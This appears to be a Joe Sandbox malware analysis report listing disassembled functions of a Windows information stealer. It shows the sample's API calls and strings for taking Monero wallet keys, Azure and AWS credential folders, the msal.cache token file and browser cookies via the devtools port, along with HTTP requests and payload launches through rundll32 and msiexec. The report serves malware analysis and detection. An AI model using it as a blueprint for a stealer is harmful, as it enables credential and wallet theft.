Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F4DBE0,00000000,?,00611544,00000000,?,?), ref: 005FCB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005FCB89
GetFileSize.KERNEL32(00000000,00000000), ref: 005FCB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005FCBA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005FCBD9
StrStrA.SHLWAPI(?,00F4DD00,00610B56), ref: 005FCBF7
StrStrA.SHLWAPI(00000000,00F4DCB8), ref: 005FCC1E
StrStrA.SHLWAPI(?,00F4E348,00000000,?,00611550,00000000,?,00000000,00000000,?,00F48B58,00000000,?,0061154C,00000000,?), ref: 005FCDA2
StrStrA.SHLWAPI(00000000,00F4E208), ref: 005FCDB9

Part of subcall function 005FC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005FC971
Part of subcall function 005FC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005FC97C

StrStrA.SHLWAPI(?,00F4E208,00000000,?,00611554,00000000,?,00000000,00F48BC8), ref: 005FCE5A
StrStrA.SHLWAPI(00000000,00F48A48), ref: 005FCE71

Part of subcall function 005FC920: lstrcat.KERNEL32(?,00610B47), ref: 005FCA43
Part of subcall function 005FC920: lstrcat.KERNEL32(?,00610B4B), ref: 005FCA57
Part of subcall function 005FC920: lstrcat.KERNEL32(?,00610B4E), ref: 005FCA78

lstrlen.KERNEL32(00000000), ref: 005FCF44
CloseHandle.KERNEL32(00000000), ref: 005FCF9C

Strings

, xrefs: 005FCAC6

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
String ID:
API String ID: 3744635739-3916222277
Opcode ID: fb49dea03a46dcb4f36673e01e77e427b522c7e340444de3ef367c8c02035937
Instruction ID: e0d33650b86606b1f6f2d3cc50f497b3102266372cc314996edf3226460bedae
Opcode Fuzzy Hash: fb49dea03a46dcb4f36673e01e77e427b522c7e340444de3ef367c8c02035937
Instruction Fuzzy Hash: BBE10971950208ABCB48EBE4DCA2FEFB77ABF14340F40459DF106661D1EB706A49CB65

Function 006084B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

RegOpenKeyExA.ADVAPI32(00000000,00F4BE90,00000000,00020019,00000000,006105BE), ref: 00608534
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006085B6
wsprintfA.USER32 ref: 006085E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060860B
RegCloseKey.ADVAPI32(00000000), ref: 0060861C
RegCloseKey.ADVAPI32(00000000), ref: 00608629

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Strings

- , xrefs: 00608733
?, xrefs: 0060850A
%s\%s, xrefs: 006085DD

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: cf054035ac67f097f8e239ef9ea1aabb21c91d9ace92d09ff8e27da53c1edaa8
Instruction ID: f74c3024dc4da945336e3147a1c9080a808a80b5d0195ca56247bd09373fc23b
Opcode Fuzzy Hash: cf054035ac67f097f8e239ef9ea1aabb21c91d9ace92d09ff8e27da53c1edaa8
Instruction Fuzzy Hash: C1811D719502189FDB68DB94CD95FEAB7B9BF48700F1086D8E14AA7180DF706B84CFA4

Function 006091A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006091FC

Strings

`d`F, xrefs: 006091CF, 00609399, 006091D2, 0060939C
`d`F, xrefs: 00609361, 006093D9, 0060930E, 006092DF, 006092B2, 0060920D, 006091E4, 00609364
image/jpeg, xrefs: 006092C6

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `d`F$`d`F$image/jpeg
API String ID: 2244384528-1312098759
Opcode ID: fd62e771e588201f7558f39eae02d7eaa54f5d920e7a38bf1aa40a2a5a19c8f7
Instruction ID: 03a0c559f3a394080f77e33d09a11ed86a7fff5c0456a12f2adfbc9ee809f610
Opcode Fuzzy Hash: fd62e771e588201f7558f39eae02d7eaa54f5d920e7a38bf1aa40a2a5a19c8f7
Instruction Fuzzy Hash: 3471CA71A54208EBDB18DFE4DC89FEEB779BB48700F108519F616A7290EB75A904CF60

Function 00604FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00608F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608F9B

lstrcat.KERNEL32(?,00000000), ref: 00605000
lstrcat.KERNEL32(?,\.azure\), ref: 0060501D

Part of subcall function 00604B60: wsprintfA.USER32 ref: 00604B7C
Part of subcall function 00604B60: FindFirstFileA.KERNEL32(?,?), ref: 00604B93

lstrcat.KERNEL32(?,00000000), ref: 0060508C
lstrcat.KERNEL32(?,\.aws\), ref: 006050A9

Part of subcall function 00604B60: StrCmpCA.SHLWAPI(?,00610FC4), ref: 00604BC1
Part of subcall function 00604B60: StrCmpCA.SHLWAPI(?,00610FC8), ref: 00604BD7
Part of subcall function 00604B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00604DCD
Part of subcall function 00604B60: FindClose.KERNEL32(000000FF), ref: 00604DE2

lstrcat.KERNEL32(?,00000000), ref: 00605118
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00605135

Part of subcall function 00604B60: wsprintfA.USER32 ref: 00604C00
Part of subcall function 00604B60: StrCmpCA.SHLWAPI(?,006108D3), ref: 00604C15
Part of subcall function 00604B60: wsprintfA.USER32 ref: 00604C32
Part of subcall function 00604B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00604C6E
Part of subcall function 00604B60: lstrcat.KERNEL32(?,00F4FCB0), ref: 00604C9A
Part of subcall function 00604B60: lstrcat.KERNEL32(?,00610FE0), ref: 00604CAC
Part of subcall function 00604B60: lstrcat.KERNEL32(?,?), ref: 00604CC0
Part of subcall function 00604B60: lstrcat.KERNEL32(?,00610FE4), ref: 00604CD2
Part of subcall function 00604B60: lstrcat.KERNEL32(?,?), ref: 00604CE6
Part of subcall function 00604B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00604CFC
Part of subcall function 00604B60: DeleteFileA.KERNEL32(?), ref: 00604D81

Strings

msal.cache, xrefs: 00605140
*.*, xrefs: 006050B4
Azure\.azure, xrefs: 00605023
Azure\.IdentityService, xrefs: 0060513B
Azure\.aws, xrefs: 006050AF
\.aws\, xrefs: 0060509D
\.azure\, xrefs: 00605011
\.IdentityService\, xrefs: 00605129
*.*, xrefs: 00605028

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: e76b4b4f3fb59cc2b88ce4823adc1a91abefe01355d02ded5c07fd374d4d3c94
Instruction ID: d2c2fb07374cb7bdb14e65a6a0276bfaaab9d22759f809ac100b438b43a68966
Opcode Fuzzy Hash: e76b4b4f3fb59cc2b88ce4823adc1a91abefe01355d02ded5c07fd374d4d3c94
Instruction Fuzzy Hash: 3A41E6BA98030867DB54F770DC47FEE733A9B54701F404498B245660C1EEF497C88B92

Function 00603080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00603415
ShellExecuteEx.SHELL32(0000003C), ref: 006035AD
ShellExecuteEx.SHELL32(0000003C), ref: 0060373A

Strings

/passive, xrefs: 006036AB
C:\Windows\system32\msiexec.exe, xrefs: 0060370F
<, xrefs: 006036E0
.dll, xrefs: 00603435
C:\Windows\system32\rundll32.exe, xrefs: 00603582
.msi, xrefs: 006035E8
"" , xrefs: 006032EA
/i ", xrefs: 00603634

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: d7df07cf54226c9a89b29b14c9d35628988dc1ff661074ff781733ec67e25dc8
Instruction ID: af9eb342f2a14e1a7b42d4f115c7dc9c75ef448ad36440d805d5529f6f0e2392
Opcode Fuzzy Hash: d7df07cf54226c9a89b29b14c9d35628988dc1ff661074ff781733ec67e25dc8
Instruction Fuzzy Hash: 34120D719502189ADB48FBE0DDA2FEFB73AAF14340F40459DE106661D2EF702B89CB59

Function 005F9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005F9A50: InternetOpenA.WININET(00610AF6,00000001,00000000,00000000,00000000), ref: 005F9A6A

lstrcat.KERNEL32(?,cookies), ref: 005F9CAF
lstrcat.KERNEL32(?,006112C4), ref: 005F9CC1
lstrcat.KERNEL32(?,?), ref: 005F9CD5
lstrcat.KERNEL32(?,006112C8), ref: 005F9CE7
lstrcat.KERNEL32(?,?), ref: 005F9CFB
lstrcat.KERNEL32(?,.txt), ref: 005F9D0D
lstrlen.KERNEL32(00000000), ref: 005F9D17
lstrlen.KERNEL32(00000000), ref: 005F9D26

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Strings

/devtools, xrefs: 005F9C0B
.txt, xrefs: 005F9D01
localhost, xrefs: 005F9BF5
cookies, xrefs: 005F9CA3
ws://localhost:9229, xrefs: 005F9C3C

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$InternetOpenlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 3174675846-3542011879
Opcode ID: 62fc48cdb1856d28fdb2a9948a1c8886b2861a0a7dc3162e15c7ed3f05aad102
Instruction ID: 20a5ad54ce778ed6a51dfc3e36335bda7f3935d050deabfc7dcf5fd7eff94371
Opcode Fuzzy Hash: 62fc48cdb1856d28fdb2a9948a1c8886b2861a0a7dc3162e15c7ed3f05aad102
Instruction Fuzzy Hash: 05514C71900608ABDB14EBE0DC9AFEE7779BF44301F404558F20AA7091EF75AA88CF65

Function 00605510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F62D0: InternetOpenA.WININET(00610DFF,00000001,00000000,00000000,00000000), ref: 005F6331
Part of subcall function 005F62D0: StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F6353
Part of subcall function 005F62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6385
Part of subcall function 005F62D0: HttpOpenRequestA.WININET(00000000,GET,?,00F4F4E8,00000000,00000000,00400100,00000000), ref: 005F63D5
Part of subcall function 005F62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F640F
Part of subcall function 005F62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F6421

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605568
lstrlen.KERNEL32(00000000), ref: 0060557F

Part of subcall function 00608FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 006055B4
lstrlen.KERNEL32(00000000), ref: 006055D3
lstrlen.KERNEL32(00000000), ref: 006055FE

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Strings

ERROR, xrefs: 006056F9
ERROR, xrefs: 00605609
ERROR, xrefs: 0060555A
ERROR, xrefs: 00605682
ERROR, xrefs: 006056BF

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 033bd99e9791a61d2f9e3214f506d98647fb157965e00c32f957d6808171e809
Instruction ID: ac661b1fc685dfd4bd63795ed7e1ec49ec119970cc94222e6cecf4c157335c40
Opcode Fuzzy Hash: 033bd99e9791a61d2f9e3214f506d98647fb157965e00c32f957d6808171e809
Instruction Fuzzy Hash: 7851DA30A502089BCB5CFFA0C9A6AFF777AAF50381F904458E50A575D2EF306B45CB5A

Function 00601520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: a62a38eb042b7a0b1463fa4dcb8826a05e2d5ec60406bccce1d68e8823cb5586
Instruction ID: f78a3aa7ac0ea4143401bcee99986d394e0bd26b9f543d6fd3e9e1b303350298
Opcode Fuzzy Hash: a62a38eb042b7a0b1463fa4dcb8826a05e2d5ec60406bccce1d68e8823cb5586
Instruction Fuzzy Hash: 3AC195B59402099BCB58EFA0DC99FDB737ABF54304F00459CF40967282EB70AA85CF95

Function 006044D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00608F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608F9B

lstrcat.KERNEL32(?,00000000), ref: 0060453C
lstrcat.KERNEL32(?,00F4F3C8), ref: 0060455B
lstrcat.KERNEL32(?,?), ref: 0060456F
lstrcat.KERNEL32(?,00F4DD90), ref: 00604583

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 00608F20: GetFileAttributesA.KERNEL32(00000000,?,005F1B94,?,?,0061577C,?,?,00610E22), ref: 00608F2F

Part of subcall function 005FA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005FA489

Part of subcall function 005FA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
Part of subcall function 005FA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
Part of subcall function 005FA110: LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
Part of subcall function 005FA110: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
Part of subcall function 005FA110: LocalFree.KERNEL32(005F148F), ref: 005FA1E0
Part of subcall function 005FA110: CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

Part of subcall function 00609550: GlobalAlloc.KERNEL32(00000000,0060462D,0060462D), ref: 00609563

StrStrA.SHLWAPI(?,00F4F380), ref: 00604643
GlobalFree.KERNEL32(?), ref: 00604762

Part of subcall function 005FA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O_,00000000,00000000), ref: 005FA23F
